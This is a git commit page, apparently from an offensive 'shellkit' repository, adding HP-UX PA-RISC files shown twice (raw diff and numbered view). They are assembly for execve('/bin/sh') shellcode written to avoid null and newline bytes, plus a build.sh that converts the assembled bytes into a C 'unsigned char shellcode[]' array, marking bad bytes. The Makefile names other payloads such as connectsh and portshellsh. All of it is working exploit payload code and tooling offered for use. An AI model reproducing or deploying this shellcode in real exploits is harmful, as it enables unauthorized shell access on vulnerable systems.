initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/hppa_hpux
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
4 files changed, 139 insertions, 0 deletions
diff --git a/other/shellkit/hppa_hpux/Makefile b/other/shellkit/hppa_hpux/Makefile
new file mode 100644
index 0000000..41621dd
--- /dev/null
+++ b/other/shellkit/hppa_hpux/Makefile
@@ -0,0 +1,14 @@
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall
+all:
+        $(CC) $(CFLAGS) -o execvesh execvesh.s
+clean:
+        rm -f *.o
+        rm -f chmod chroot connectsh execvesh exit portshellsh read \
+                setgid setreuid
diff --git a/other/shellkit/hppa_hpux/build.sh b/other/shellkit/hppa_hpux/build.sh
new file mode 100644
index 0000000..5a77f25
--- /dev/null
+++ b/other/shellkit/hppa_hpux/build.sh
@@ -0,0 +1,57 @@
+#!/bin/sh
+#c89 -c -o object.o $1
+#objdump -D cbegin $1 | egrep "[0-9a-f]+:" | cut -c 7- | \
+#       awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \
+#               $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \
+#       object.h
+#gcc -o $2 ../codedump.c -DHPUX
+#rm -f object.h
+# i knew learning awk would repay some day ;-P
+objdump -D execvesh | \
+awk '
+        function pbyte (CHAR) {
+                if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
+                        printf ("_");
+                printf ("\\x%s", CHAR);
+                if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
+                        printf ("_");
+                return;
+        }
+        BEGIN {
+                foo = 0;
+        }
+        /cbegin/ {
+                foo = 1;
+                ccount = 0;
+                printf ("unsigned char shellcode[] =");
+        }
+        foo == 1 && /cend/ {
+                foo = 0;
+                if (ccount == 0) {
+                        printf (";\n");
+                } else {
+                        printf ("\";\n");
+                }
+        }
+        foo == 1 && /[0123456789abcdef]+\:/ {
+                if (ccount == 0) {
+                        printf ("\n\t\"");
+                }
+                pbyte($2);
+                pbyte($3);
+                pbyte($4);
+                pbyte($5);
+                ccount += 4;
+                if (ccount == 12) {
+                        ccount = 0;
+                        printf ("\"")
+                }
+        }'
diff --git a/other/shellkit/hppa_hpux/execvesh.s b/other/shellkit/hppa_hpux/execvesh.s
new file mode 100644
index 0000000..49b1b33
--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s
@@ -0,0 +1,36 @@
+        .LEVEL 1.1
+        .SPACE $TEXT$
+        .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+        .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+        bl      cbegin, %r1
+        nop
+        .align 4
+        .SUBSPA $DATA$
+        .EXPORT cbegin
+cbegin
+        bl      moo,%r26
+moo
+        addi,>  0x3b,%r0,%r22
+        addi,<  0x1d,%r26,%r26
+        stw     %r0,4(%sp)
+        stw     %r26,0(%sp)
+        xor     %r0,%sp,%r25
+        xor     %r24,%r24,%r24
+        ldil    L%0xc0000004,%r21
+        ble     R%0xc0000004(%sr7,%r21)
+        stbs    %r0,7(%r26)
+        .STRING "/bin/sh\x41"
+        .EXPORT cend
+cend
+        nop
diff --git a/other/shellkit/hppa_hpux/execvesh.s-backup b/other/shellkit/hppa_hpux/execvesh.s-backup
new file mode 100644
index 0000000..c2d3559
--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s-backup
@@ -0,0 +1,32 @@
+        .LEVEL 1.1
+        .SPACE $TEXT$
+        .align 4
+        .EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
+cbegin
+        .PROC
+        .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
+        bl      moo,%r26
+moo
+        xor     %r25,%r25,%r25
+        addi,<  0x11,%r26,%r26
+        stbs    %r0,7(%r26)
+        ldil    L%0xc0000004,%r21
+        ble     R%0xc0000004(%sr7,%r21)
+        ldo     0xb(%r0),%r22
+        .STRING "/bin/sh\x41"
+        .PROCEND
+        .EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
+cend
+        .PROC
+        .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
+        .PROCEND
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/hppa_hpux
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/hppa_hpux/Makefile b/other/shellkit/hppa_hpux/Makefile new file mode 100644 index 0000000..41621dd --- /dev/null +++ b/other/shellkit/hppa_hpux/Makefile
@@ -0,0 +1,14 @@
	1
	2	#DFLAGS=-O2
	3	DFLAGS=-g -ggdb
	4	CC=gcc
	5	CFLAGS=$(DFLAGS) -Wall
	6
	7	all:
	8	$(CC) $(CFLAGS) -o execvesh execvesh.s
	9
	10	clean:
	11	rm -f *.o
	12	rm -f chmod chroot connectsh execvesh exit portshellsh read \
	13	setgid setreuid
	14


diff --git a/other/shellkit/hppa_hpux/build.sh b/other/shellkit/hppa_hpux/build.sh new file mode 100644 index 0000000..5a77f25 --- /dev/null +++ b/other/shellkit/hppa_hpux/build.sh
@@ -0,0 +1,57 @@
	1	#!/bin/sh
	2
	3	#c89 -c -o object.o $1
	4	#objdump -D cbegin $1 \| egrep "[0-9a-f]+:" \| cut -c 7- \| \
	5	# awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \
	6	# $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \
	7	# object.h
	8	#gcc -o $2 ../codedump.c -DHPUX
	9	#rm -f object.h
	10
	11	# i knew learning awk would repay some day ;-P
	12	objdump -D execvesh \| \
	13	awk '
	14	function pbyte (CHAR) {
	15	if (match (CHAR, /(00)\|(0a)\|(0d)\|(25)/))
	16	printf ("_");
	17	printf ("\\x%s", CHAR);
	18	if (match (CHAR, /(00)\|(0a)\|(0d)\|(25)/))
	19	printf ("_");
	20	return;
	21	}
	22
	23	BEGIN {
	24	foo = 0;
	25	}
	26
	27	/cbegin/ {
	28	foo = 1;
	29	ccount = 0;
	30	printf ("unsigned char shellcode[] =");
	31	}
	32
	33	foo == 1 && /cend/ {
	34	foo = 0;
	35	if (ccount == 0) {
	36	printf (";\n");
	37	} else {
	38	printf ("\";\n");
	39	}
	40	}
	41
	42	foo == 1 && /[0123456789abcdef]+\:/ {
	43	if (ccount == 0) {
	44	printf ("\n\t\"");
	45	}
	46	pbyte($2);
	47	pbyte($3);
	48	pbyte($4);
	49	pbyte($5);
	50	ccount += 4;
	51
	52	if (ccount == 12) {
	53	ccount = 0;
	54	printf ("\"")
	55	}
	56	}'
	57


diff --git a/other/shellkit/hppa_hpux/execvesh.s b/other/shellkit/hppa_hpux/execvesh.s new file mode 100644 index 0000000..49b1b33 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s
@@ -0,0 +1,36 @@
	1
	2	.LEVEL 1.1
	3
	4	.SPACE $TEXT$
	5	.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
	6
	7	.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
	8	main
	9	bl cbegin, %r1
	10	nop
	11
	12	.align 4
	13
	14	.SUBSPA $DATA$
	15	.EXPORT cbegin
	16
	17	cbegin
	18	bl moo,%r26
	19	moo
	20	addi,> 0x3b,%r0,%r22
	21	addi,< 0x1d,%r26,%r26
	22	stw %r0,4(%sp)
	23	stw %r26,0(%sp)
	24	xor %r0,%sp,%r25
	25	xor %r24,%r24,%r24
	26
	27	ldil L%0xc0000004,%r21
	28	ble R%0xc0000004(%sr7,%r21)
	29	stbs %r0,7(%r26)
	30
	31	.STRING "/bin/sh\x41"
	32
	33	.EXPORT cend
	34	cend
	35	nop
	36


diff --git a/other/shellkit/hppa_hpux/execvesh.s-backup b/other/shellkit/hppa_hpux/execvesh.s-backup new file mode 100644 index 0000000..c2d3559 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s-backup
@@ -0,0 +1,32 @@
	1
	2	.LEVEL 1.1
	3
	4	.SPACE $TEXT$
	5
	6	.align 4
	7	.EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
	8
	9	cbegin
	10	.PROC
	11	.CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
	12
	13	bl moo,%r26
	14	moo
	15	xor %r25,%r25,%r25
	16	addi,< 0x11,%r26,%r26
	17	stbs %r0,7(%r26)
	18	ldil L%0xc0000004,%r21
	19	ble R%0xc0000004(%sr7,%r21)
	20	ldo 0xb(%r0),%r22
	21
	22	.STRING "/bin/sh\x41"
	23
	24	.PROCEND
	25
	26
	27	.EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
	28	cend
	29	.PROC
	30	.CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
	31
	32	.PROCEND